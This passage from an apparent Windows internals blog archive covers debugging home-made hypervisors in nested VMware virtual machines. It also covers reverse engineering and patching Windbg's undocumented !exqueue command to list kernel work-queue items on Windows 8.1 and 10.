<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrE_YFnxIglnSr3smGI__Hvw_PtU0WppOCnYKaod6iuTijCY5ZmWia6F8uBzrXiCqvxaleZ8A0h-b-vd3ah48ArGjVbBhmPyruM7FZpq-lqJ81A-HS03jpD_TWv3wxlLr3Ljh45lzT7Cw/s1600/4qZ92uG.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrE_YFnxIglnSr3smGI__Hvw_PtU0WppOCnYKaod6iuTijCY5ZmWia6F8uBzrXiCqvxaleZ8A0h-b-vd3ah48ArGjVbBhmPyruM7FZpq-lqJ81A-HS03jpD_TWv3wxlLr3Ljh45lzT7Cw/s1600/4qZ92uG.jpg" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: USB2 debug-cable. Not recommended.</td></tr>
</tbody></table>
</div>
<div>
<h3>
Configuring Virtual Machines</h3>
</div>
<div>
You have to make some changes to the debuggee virtual machine. First, check the following options:</div>
<div>
<ul>
<li>Virtualize Intel VT-x/EPT or AMD-V/RVI</li>
<li>Virtualize CPU performance counters</li>
</ul>
</div>
<div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Y7bBiFUwRnuZsKESvV3VJOOc5xzUPp4EyM1W02zoHdl_kU5yGW9wwlQVRMr0kUlJRFAmfzEJZph0oXsDWIvuInHw4YW_P9KXnNgUVB_5Yr2iluGTB4K_2wdGXFiuXkqzwHc4Ig2DB3M/s1600/vm_config.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1Y7bBiFUwRnuZsKESvV3VJOOc5xzUPp4EyM1W02zoHdl_kU5yGW9wwlQVRMr0kUlJRFAmfzEJZph0oXsDWIvuInHw4YW_P9KXnNgUVB_5Yr2iluGTB4K_2wdGXFiuXkqzwHc4Ig2DB3M/s1600/vm_config.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 2: Virtual Machine Config</td></tr>
</tbody></table>
<br />
Second, add the following lines to the corresponding VMX file <a href="http://social.technet.microsoft.com/wiki/contents/articles/22283.how-to-install-hyper-v-on-vmware-workstation-10.aspx" target="_blank">[1]</a>; otherwise, you will end up with mysterious, random-looking NMI_HARDWARE_FAILURE bug checks.<br />
----</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">hypervisor.cpuid.v0 = "FALSE"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">mce.enable = "TRUE"</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">vhu.enable = "TRUE" </span></div>
<div>
----<br />
<br />
<span style="font-size: x-small;">EDIT (Nov 1, 2015): Removed entries with apic.xapic since I confirmed that it still worked without them.</span><br />
<br /></div>
<div>
<h3>
Gotchas</h3>
</div>
<div>
Once you have configured the VM, the rest is only a matter of programming, but there are some gotchas I would like to share to keep you sane:<br />
<ul>
<li>Try to avoid calling APIs inside the VMExit handler (in VMX root mode). Since the handler can be executed from any context, including exception handlers and code running at a very high IRQL, it is hard to conclude that calling an API is 100% safe unless you know *exactly* what it does. </li>
<li>For the same reason, avoid calling DbgPrint() from the VMExit handler. It usually works fine but sometimes causes mysterious errors, such as a triple fault, when you log heavily. Instead, store log text in a pre-allocated non-paged pool buffer and print it later from a safe context. </li>
<li>Do not step into the vmlaunch and vmresume instructions. The debugger will never return control to you, and the debuggee will hang. </li>
<li>Do not put software breakpoints everywhere in the VMExit handler. Although it seems to be fine in most cases, in some situations the debugger does not get control from the debuggee, and the system just freezes when int 3 is executed. </li>
</ul>
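The deferred-logging advice above can be sketched roughly as follows. This is a user-mode model under stated assumptions, not code from any real hypervisor: DeferredLog, log_append(), log_flush(), print_message() and the 4096-byte capacity are all hypothetical names and values. In a driver the buffer would live in non-paged pool, print_message() would be replaced by a DbgPrint() call, and access would need per-processor buffers or a lock because VM exits happen on every processor.<br />

```c
#include <assert.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define LOG_CAPACITY 4096  /* hypothetical size, allocated before entering VMX operation */

typedef struct {
    char   data[LOG_CAPACITY];  /* NUL-separated messages */
    size_t used;                /* bytes currently stored */
    size_t dropped;             /* messages discarded because the buffer was full */
} DeferredLog;

/* Called from the VM-exit handler: copies the message only, with no
 * allocation and no printing. Returns 1 if stored, 0 if dropped. */
int log_append(DeferredLog *log, const char *msg)
{
    assert(log != NULL && msg != NULL);
    size_t len = strlen(msg) + 1;  /* keep the terminating NUL as a separator */
    if (len > LOG_CAPACITY - log->used) {
        log->dropped++;
        return 0;
    }
    memcpy(log->data + log->used, msg, len);
    log->used += len;
    return 1;
}

/* Called later from a safe context: passes each stored message to emit,
 * empties the buffer, and returns the number of messages emitted. */
size_t log_flush(DeferredLog *log, void (*emit)(const char *))
{
    assert(log != NULL && emit != NULL);
    size_t count = 0;
    for (size_t off = 0; off < log->used; off += strlen(log->data + off) + 1) {
        emit(log->data + off);
        count++;
    }
    log->used = 0;
    return count;
}

/* Stand-in for the real output routine. */
void print_message(const char *msg)
{
    puts(msg);
}
```

Dropping messages when the buffer is full, instead of blocking or allocating, is a deliberate choice here: the handler must never wait on anything.<br />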
</div>
<div>
<h3>
Getting a Memory Dump From a Hung Debuggee System</h3>
One of the biggest advantages of using VMware is that you can take a memory dump (a .dmp file) from a hung debuggee and give it to Windbg just like in normal crash dump analysis. </div>
<div>
<br />
To take a dump file, first suspend the virtual machine while it is frozen and take a snapshot.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJ2-X5Bd38O9Wx0BRSwqnzmlhc_Bwq_RcZE3sIqRLULAJ49fKpxfpRH8T9rD7XDK36ArmIbxAaS11MSpVZ2Hf6cBmhespMl51w-vo_nihhLhNB8sc2kSFbT5hafT2_MdpRXH0PDaAckk/s1600/suspend.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSJ2-X5Bd38O9Wx0BRSwqnzmlhc_Bwq_RcZE3sIqRLULAJ49fKpxfpRH8T9rD7XDK36ArmIbxAaS11MSpVZ2Hf6cBmhespMl51w-vo_nihhLhNB8sc2kSFbT5hafT2_MdpRXH0PDaAckk/s1600/suspend.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 3: Suspend a hung virtual machine</td></tr>
</tbody></table>
<br />
Then, navigate to where snapshot files are stored and run the vmss2core command under the VMware Workstation directory with names of the latest vmsn and vmem files. For instance, commands look like this:<br />
----<br />
<span style="font-family: Courier New, Courier, monospace;">> cd "C:\Users\user\Documents\Virtual Machines\Windows 8 x64"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">> "C:\Program Files (x86)\VMware\VMware Workstation\vmss2core-win.exe" -W8 "Windows 8 x64-Snapshot45.vmsn" "Windows 8 x64-Snapshot45.vmem"</span><br />
<span style="font-family: Courier New, Courier, monospace;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">vmss2core version <span style="color: red;">2452889 </span>Copyright (C) 1998-2015 VMware, Inc. All rights reserved.</span><br />
<span style="font-family: Courier New, Courier, monospace;">scanning pa=0 len=0x10000000</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cannot translate linear address 7ff7d12b1b00.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Cannot read context LA from PRCB.</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2020 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2030 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">... 2040 MBs written.</span><br />
<span style="font-family: Courier New, Courier, monospace;">Finished writing core.</span><br />
----<br />
Note that the vmss2core that ships with VMware Workstation by default (version 2780323) does not seem to work (it always generates empty, 0-byte files). If that is the case for you too, download version 2452889 from <a href="https://labs.vmware.com/flings/vmss2core" target="_blank">VMware's website</a>.<br />
<br />
Now you have memory.dmp and can give it to the debugger.<br />
----<br />
<span style="font-family: Courier New, Courier, monospace;">> windbg -z memory.dmp</span><br />
<div>
----</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUscBWaZZhuH1o_7rCNfVUEsJ3al7457nmBiA86ITI7J-Tm23C7ry7lDMblJc5NVZ6pTpEYdA5lDWnITCH-8rp_WoBLLMgVJLrQ5MF6NkUfnnzTSCFQjlN2z1AcPacNQpE45mMGO6sL_s/s1600/dump.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUscBWaZZhuH1o_7rCNfVUEsJ3al7457nmBiA86ITI7J-Tm23C7ry7lDMblJc5NVZ6pTpEYdA5lDWnITCH-8rp_WoBLLMgVJLrQ5MF6NkUfnnzTSCFQjlN2z1AcPacNQpE45mMGO6sL_s/s1600/dump.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 4: Memory dump analysis</td></tr>
</tbody></table>
<br />
<ul>
<li>Link: <a href="http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2003941" target="_blank">Converting a snapshot file to memory dump using the vmss2core tool (2003941)</a></li>
</ul>
<br />
<br />
<h3>
References</h3>
There are some open source hypervisor projects you can refer to for implementation. Those are small enough to read quickly and written for Windows hosts.<br />
<ul>
<li><a href="https://github.com/zer0mem/MiniHyperVisorProject" target="_blank">MiniHyperVisorProject</a> by Peter Hlavaty</li>
<li><a href="https://code.google.com/p/bluepillstudy/" target="_blank">Blue Pill</a> by Joanna Rutkowska</li>
<li><a href="https://code.google.com/p/virtdbg/" target="_blank">virtdbg</a></li>
<li><a href="https://code.google.com/p/hyperdbg/" target="_blank">hyperdbg</a></li>
</ul>
</div>
<div>
<br /></div>
<div>
<h3>
A Sample Monitoring Tool Based on a Hypervisor</h3>
With those tips, you should be able to develop your own hypervisor fairly smoothly and utilize it for your research. I, for example, wrote a proof-of-concept hypervisor, <a href="https://github.com/tandasat/Sushi" target="_blank">Sushi</a>, monitoring use of some uncommon instructions from non-image kernel space and stopping a thread when write protection in CR0 is modified.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBY-Tu9z9I_MNt8aTwPhoHawaEWlDahyphenhyphenQeQDqnfZy65pe98ShXdiOhpoShEv-RGsnftvx7YrVq4b5wyRt2JkhX6QJJeREPGmXF43M4wqGJdqngd4z6j4PhpJB0X90EC8Ccs30QXs6tAQ4/s1600/sushi.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="549" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBY-Tu9z9I_MNt8aTwPhoHawaEWlDahyphenhyphenQeQDqnfZy65pe98ShXdiOhpoShEv-RGsnftvx7YrVq4b5wyRt2JkhX6QJJeREPGmXF43M4wqGJdqngd4z6j4PhpJB0X90EC8Ccs30QXs6tAQ4/s640/sushi.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 5: Demo hypervisor "Sushi" detecting interesting stuff</td></tr>
</tbody></table>
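To give an idea of how small the core check can be, here is a minimal sketch of the "write protection in CR0 is modified" test. It is not taken from Sushi: the function name is hypothetical, and it assumes the hypervisor has arranged for guest writes to CR0.WP to cause a VM exit (on VT-x this is typically done through the CR0 guest/host mask) so that it sees both the current value and the value the guest is trying to load.<br />

```c
#include <stdint.h>

#define CR0_WP (1ULL << 16)  /* CR0.WP (write protect) is bit 16 */

/* Returns 1 when replacing old_cr0 with new_cr0 would turn write
 * protection off, and 0 otherwise. */
int clears_write_protection(uint64_t old_cr0, uint64_t new_cr0)
{
    return (old_cr0 & CR0_WP) != 0 && (new_cr0 & CR0_WP) == 0;
}
```

A monitoring tool would then combine this with a check of where the guest instruction pointer is, and only react when the write comes from outside any loaded image.<br />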
<br /></div>
<div>
This is less than 4000 lines of code, yet it lets me investigate run-time behaviour of the kernel that I was previously unable to monitor. It is pretty awesome, and above all, playing with low-level stuff like this is quite fun.<br />
<br />
In short, if you are interested in developing hypervisors for whatever reasons, you can do it without buying any extra hardware, and then, you can also make it one of your analysis tools like this demo hypervisor.<br />
<br />
<h3>
Thanks</h3>
Thank you @brucedang for letting me know that nested virtualization of VMware is reliable enough to write and test hypervisors.</div>
Satoshi Tandahttp://www.blogger.com/profile/14201125639595582699noreply@blogger.com14tag:blogger.com,1999:blog-2937860723034111347.post-44266150861590569952015-06-07T13:52:00.001-07:002015-10-18T11:16:45.320-07:00Reverse Engineering Windbg Commands for Profit <script src="https://google-code-prettify.googlecode.com/svn/loader/run_prettify.js"></script>
In this article, I will show the benefit of reverse engineering Windbg for understanding the Windows kernel by looking at an undocumented command, fixing an issue in it, and re-implementing the same functionality in a device driver.<br />
<br />
<br />
Windbg is a powerful resource, not only because it shows thorough run-time information even when you do not know how to obtain it manually, but also because you can learn how Windbg obtains it by reverse engineering it. The implementation of the <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff565456(v=vs.85).aspx" target="_blank">!timer</a> command is, for example, what you should examine if you want to know how to enumerate all scheduled timer callbacks.<br />
<br />
But what if you cannot find a command that works with the internals you are interested in? In my case, I was looking for a way to list items inserted into the work queues with ExQueueWorkItem(), and the Windbg documentation did not say which command I could use.<br />
<br />
<h3>
Finding an Undocumented Command</h3>
There are many undocumented commands in Windbg. Running strings.exe against the DLL files under the Windbg folder gives you hints about them and about where to look. Here is the result of a search for "workqueue":<br />
<br />
<span style="font-size: xx-small;">Debuggers\x64><span style="color: red;">strings -n 5 -s *.dll | findstr /i workqueue</span></span><br />
<span style="font-size: xx-small;">...</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i RealTime WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i HyperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i SuperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Critical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Delayed WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Normal WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** NUMA Node %i Background WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** Critical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** Delayed WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: **** HyperCritical WorkQueue</span><br />
<span style="font-size: xx-small;">Debuggers\x64\winxp\kdexts.dll: ExWorkQueue</span><br />
<span style="font-size: xx-small;">...</span><br />
<br />
After firing up IDA, I easily found that there was an undocumented (*1) command named !exqueue, and it was exactly what I wanted.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> !kdexts.help</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">exqueue [flags] - Dump the ExWorkerQueues</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<br />
<h3>
Fixing an Issue</h3>
The issue was that this command did not work against Windows 8.1 and 10 targets.<br />
<br />
<span style="font-size: xx-small;">kd> !exqueue</span><br />
<span style="font-size: xx-small;">GetGlobalValue: unable to get NT!KeNumberNodes type size</span><br />
<br />
So, I debugged and reverse engineered kdexts.dll a bit more and noticed that Windbg was failing to read nt!KeNumberNodes, which is always 1 unless you use NUMA. The solution was simply to patch the code so that it sets eax to 1.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161DA lea rcx, aNtKenumbernode </span><span style="color: blue; font-family: 'Courier New', Courier, monospace; font-size: xx-small;">; "NT!KeNumberNodes"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><strike>.text:00000001801161E1 call read_global_variable</strike></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161E1 mov eax, 1</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161E6 mov rbx, cs:qword_1801A8500</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161ED mov rcx, rbx</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">.text:00000001801161F0 mov rbp, rax</span><br />
<br />
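The patch fits in place because the replaced call and the new mov are both five bytes long: the listing shows the call at 1801161E1 and the next instruction at 1801161E6. As a minimal sketch, the replacement bytes can be produced like this. The function name and PATCH_SIZE are hypothetical, and the code only builds the bytes; writing them into kdexts.dll is left to a hex editor or to IDA.<br />

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define PATCH_SIZE 5  /* length of both "call rel32" and "mov eax, imm32" */

/* Writes the encoding of "mov eax, imm32" (opcode B8 followed by the
 * 32-bit immediate in little-endian order) into out and returns the
 * number of bytes written. */
size_t encode_mov_eax_imm32(uint32_t imm, uint8_t out[PATCH_SIZE])
{
    assert(out != NULL);
    out[0] = 0xB8;
    for (size_t i = 0; i < 4; ++i) {
        out[1 + i] = (uint8_t)(imm >> (8 * i));
    }
    return PATCH_SIZE;
}
```

Calling it with an immediate of 1 yields B8 01 00 00 00. Because a write to eax zero-extends into rax on x64, the following "mov rbp, rax" still receives the value 1.<br />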
Here is the output of the patched command:<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> !exqueue</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="font-size: xx-small;"><br /></span>
<span style="font-size: xx-small;">**** NUMA Node 0 - ( Threads: 7/4096 ) ****</span></span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> -> Priority 12 - ( Concurrency: 0/2 )</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (ffffe00084a91160) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine ListWorkItems!<lambda_bae...> </span>(fffff800746e5290) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (fffff800746e7220)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (ffffe0008105ff10) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine dxgkrnl!DxgkpProcessTerminationListThread </span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">(...) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (ffffe0008105fbb0)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">WdfWorkItem (ffffe00082b035a0) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine cdrom!IoctlWorkItemRoutine</span> (fffff80072c6e900)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> <span style="color: red;">ExWorkItem (fffff8006b8ff0c0) </span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> Routine nt!CmpDelayDerefKCBWorker</span> (fffff8006ba5d008) </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> Parameter (0000000000000000)</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> -> Priority 31 - ( Concurrency: 0/2 )</span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="font-size: xx-small;"><br /></span>
<span style="font-size: xx-small;"> -> Associated Threads</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">THREAD ffffe000828fe040 Cid 0004.0170 Teb: 0000000000000000 Win32Thread: 0000000000000000 WAIT</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<br />
<h3>
Re-implementing the Command</h3>
<br />
<div>
My goal was, however, not to use the command; the goal was to know how it works, so I reverse engineered !exqueue more to learn the details of the work queues and how to enumerate items in them by hand.<br />
<br />
Analyzing Windbg commands is often a lot easier than analyzing the kernel file because it contains a lot of strings that help you know what structures are dealt with.<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYNu6DiVZ6n91Ujsenx4YqadgnRBsKfTY9OqS5mTvDU8s6qoEe4YCT-ZgXFWxzsjXfI9NmJmDmC9J2kQiPci2qObd0oc6QDmxWfPuDW6BodWOxjOVUEuYLdCOJoiGLcn5SwbEsBkicI5g/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYNu6DiVZ6n91Ujsenx4YqadgnRBsKfTY9OqS5mTvDU8s6qoEe4YCT-ZgXFWxzsjXfI9NmJmDmC9J2kQiPci2qObd0oc6QDmxWfPuDW6BodWOxjOVUEuYLdCOJoiGLcn5SwbEsBkicI5g/s320/1.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Image 1: Strings in the code of !exqueue</td></tr>
</tbody></table>
This time was no exception. Basically, for Windows 8 and later, the command first gets a NUMA node (nt!_ENODE) structure, which contains a reference to the work queues, by looking at nt!KeNumberNodes and nt!KeNodeBlock. Here, I follow the same procedure as !exqueue using basic commands.<br />
<br />
There is only one NUMA node block as I do not configure NUMA.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dw nt!KeNumberNodes</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f5774008 <span style="color: red;">0001</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dps nt!KeNodeBlock</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c800 <span style="color: red;">fffff803`f56c3240</span> nt!ExNode0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c808 00000000`00000000</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">fffff803`f576c810 00000000`00000000</span></div>
<div>
<br />
Then, the command refers to the _ENODE.ExWorkQueue.WorkPriQueue.EntryListHead field, which is an array of the prioritized work queues.<br />
<br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dt nt!_ENODE ExWorkQueue.WorkPriQueue. <span style="color: red;">fffff803`f56c3240</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x0c0 ExWorkQueues : [8]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x100 ExWorkQueue :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 WorkPriQueue :</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 Header : _DISPATCHER_HEADER</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x018 <span style="color: red;">EntryListHead : [32] _LIST_ENTRY [</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> 0xfffff803`f56c3358 -</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><span style="color: red;"> 0xfffff803`f56c3358 </span></span><span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: xx-small;">]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x218 CurrentCount : [32] 0n0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x298 MaximumCount : 4</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x2a0 ThreadListHead : _LIST_ENTRY [</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xffffe000`eb78f248 -</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xffffe000`ecd89a88 ]</span></div>
<br />
Each element of EntryListHead is a list of work items (nt!_WORK_QUEUE_ITEM), and the array index represents the priority of each list; in other words, there are 32 work queues, which hold items with priority 0 (the lowest) through 31 (the highest) respectively.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">kd> dt nt!_ENODE -a ExWorkQueue.WorkPriQueue.EntryListHead </span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">fffff803`f56c3240</span><br />
<span style="color: red; font-family: 'Courier New', Courier, monospace; font-size: xx-small;"> </span><span style="font-family: 'Courier New', Courier, monospace; font-size: xx-small;">...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> [12] _LIST_ENTRY [ <span style="color: red;">0xffffe000`846f62f0</span> - 0xffffe000`82bea2c0 ]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> ...</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;">kd> dt nt!_WORK_QUEUE_ITEM <span style="color: red;">0xffffe000`846f62f0</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x000 List : _LIST_ENTRY [ 0xffffe000`8305d130 -</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> 0xfffff800`6b8ca418 ]</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x010 <span style="color: red;">WorkerRoutine : 0xfffff800`746dd290</span> </span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> void ListWorkItems!&lt;lambda_7d382b...&gt;+0</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: xx-small;"> +0x018 Parameter : 0xfffff800`746df220 Void</span><br />
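<br />
The manual walk above can also be sketched in a few lines of Python. This is only an illustration: the offsets are copied from the dt output shown in this post and may differ on other builds, read_qword stands for any function that returns the 64-bit value at a kernel address, and build_fake_memory is a made-up helper that fakes such memory so the sketch can run without a debugger.<br />
<br />
```python
# Offsets taken from the dt output in this post; other builds may differ.
LIST_ENTRY_SIZE = 0x10          # two 64-bit pointers: Flink and Blink
ENTRY_LIST_HEAD_OFFSET = 0x118  # _ENODE.ExWorkQueue (+0x100) + EntryListHead (+0x018)
WORKER_ROUTINE_OFFSET = 0x10    # _WORK_QUEUE_ITEM.WorkerRoutine
PARAMETER_OFFSET = 0x18         # _WORK_QUEUE_ITEM.Parameter
PRIORITY_COUNT = 32             # EntryListHead has 32 elements


def list_head_address(enode, priority):
    """Address of EntryListHead[priority] inside the given _ENODE."""
    return enode + ENTRY_LIST_HEAD_OFFSET + priority * LIST_ENTRY_SIZE


def walk_list(read_qword, head):
    """Yield every entry linked from a circular LIST_ENTRY head."""
    entry = read_qword(head)       # head.Flink
    while entry != head:           # an empty list points back to itself
        yield entry
        entry = read_qword(entry)  # entry.Flink


def enumerate_work_items(read_qword, enode):
    """Yield (priority, item, routine, parameter) for every queued item."""
    for priority in range(PRIORITY_COUNT):
        head = list_head_address(enode, priority)
        for item in walk_list(read_qword, head):
            # List is at offset 0, so the entry address is the item address.
            yield (priority, item,
                   read_qword(item + WORKER_ROUTINE_OFFSET),
                   read_qword(item + PARAMETER_OFFSET))


def build_fake_memory(enode, queued):
    """Hypothetical helper: fake memory as {address: qword}.

    queued maps a priority to a list of (item, routine, parameter).
    Only Flink pointers are populated because the walk never reads Blink.
    """
    memory = {}
    for priority in range(PRIORITY_COUNT):
        head = list_head_address(enode, priority)
        items = queued.get(priority, [])
        chain = [head] + [item for item, _, _ in items] + [head]
        for current, following in zip(chain, chain[1:]):
            memory[current] = following
        for item, routine, parameter in items:
            memory[item + WORKER_ROUTINE_OFFSET] = routine
            memory[item + PARAMETER_OFFSET] = parameter
    return memory


if __name__ == "__main__":
    ENODE = 0xfffff803f56c3240
    fake = build_fake_memory(
        ENODE, {12: [(0xffffe000846f62f0, 0xfffff800746dd290, 0xfffff800746df220)]})
    for priority, item, routine, parameter in enumerate_work_items(fake.__getitem__, ENODE):
        print(f"priority {priority}: item {item:#x} routine {routine:#x} parameter {parameter:#x}")
```
<br />
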